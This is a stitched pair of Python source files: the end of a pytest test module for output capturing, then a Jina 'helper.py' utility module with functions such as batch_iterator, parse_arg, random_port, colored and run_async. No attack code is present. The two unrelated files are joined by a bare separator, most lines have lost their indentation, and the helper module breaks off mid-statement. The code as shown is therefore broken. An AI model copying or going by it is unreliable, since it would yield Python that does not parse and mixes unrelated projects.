result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
    Usage: pass kwargs where each key is the deprecated argument name and each value is a tuple ``(new_name, deprecate_level)``.
    A deprecate level of 0 issues a warning, a level of 1 raises an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
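# Illustrative usage sketch, not part of the original helper.py: `_demo_encode` below is a
# hypothetical function showing how `deprecated_alias` forwards an old keyword (level 0)
# to its new name while emitting a DeprecationWarning.
def _demo_deprecated_alias():
    @deprecated_alias(input_fn=('inputs', 0))
    def _demo_encode(inputs=None):
        return inputs
    # calling with the deprecated name warns and forwards the value to `inputs`
    return _demo_encode(input_fn=[1, 2, 3])  # -> [1, 2, 3]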
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
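# Illustrative usage sketch, not part of the original helper.py: expected outputs of
# `get_readable_size` for a few byte counts.
def _demo_get_readable_size():
    assert get_readable_size(512) == '512 Bytes'
    assert get_readable_size(2048) == '2.0 KB'
    assert get_readable_size(3 * 1024 ** 2) == '3.0 MB'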
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
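# Illustrative usage sketch, not part of the original helper.py: batching a list (sliced
# per batch) and a plain iterator (collected into tuples, since its length is unknown).
def _demo_batch_iterator():
    assert list(batch_iterator(list(range(7)), 3)) == [[0, 1, 2], [3, 4, 5], [6]]
    assert list(batch_iterator(iter(range(5)), 2)) == [(0, 1), (2, 3), (4,)]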
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
        # strip the surrounding brackets and parse each comma-separated element
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
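# Illustrative usage sketch, not part of the original helper.py: `parse_arg` converts
# CLI-style strings into Python values.
def _demo_parse_arg():
    assert parse_arg('3') == 3
    assert parse_arg('0.5') == 0.5
    assert parse_arg('true') is True
    assert parse_arg('[1, 2]') == [1, 2]
    assert parse_arg('"quoted"') == 'quoted'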
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
    .. note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
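# Illustrative usage sketch, not part of the original helper.py: `_DEMO_PORT` is a made-up
# environment variable; `{root...}` references are resolved against the whole dict and
# `$VAR` values are expanded from the environment, then parsed by `expand_env_var`.
def _demo_expand_dict():
    os.environ['_DEMO_PORT'] = '8080'
    d = {'host': 'localhost', 'port': '$_DEMO_PORT', 'url': 'http://{root.host}:{root.port}'}
    expanded = expand_dict(d)
    assert expanded['port'] == 8080
    assert expanded['url'] == 'http://localhost:8080'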
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if os.name == 'nt':
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
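# Illustrative usage sketch, not part of the original helper.py: coloring a single string
# versus coloring everything printed inside a ColorContext block.
def _demo_colored_output():
    print(colored('all good', color='green', attrs='bold'))
    with ColorContext('cyan'):
        print('printed in cyan until the block exits')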
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]], parser: ArgumentParser
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
try:
p_args, unknown_args = parser.parse_known_args(args)
except SystemExit:
raise ValueError(
f'bad arguments "{args}" with parser {parser}, '
'you may want to double check your args '
)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
            'pyzmq': zmq.pyzmq_version(),
            'numpy': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
if 'JINA_DISABLE_UVLOOP' in os.environ:
return
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
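# Illustrative usage sketch, not part of the original helper.py: `_DemoStore` is a made-up
# class combining `cached_property` with `cache_invalidate` so that mutating the data
# drops the cached value.
class _DemoStore:
    def __init__(self):
        self._items = [1, 2, 3]
    @cached_property
    def total(self):
        # computed once, then served from the instance __dict__ under CACHED_total
        return sum(self._items)
    @cache_invalidate(attribute='total')
    def add(self, x):
        self._items.append(x)
def _demo_cache_invalidate():
    s = _DemoStore()
    assert s.total == 6
    s.add(4)  # removes CACHED_total before running the mutation
    assert s.total == 10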
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
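# Illustrative usage sketch, not part of the original helper.py:
def _demo_get_readable_time():
    assert get_readable_time(seconds=3661) == '1 hour and 1 minute and 1 second'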
def get_internal_ip():
"""
    Return the private IP address of the gateway so that other machines on the same network can connect to it.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
    Return the public IP address of the gateway so that other machines on the public network can connect to it.
    :param timeout: the seconds to wait until return None.
    :return: Public IP address.
    .. warning::
        Setting :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
    Check if we're running in a Jupyter notebook, using the magic command `get_ipython` which is only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
    When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
    Directly calling asyncio.run would fail with "This function cannot be called when another asyncio event loop
    is running in the same thread".
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
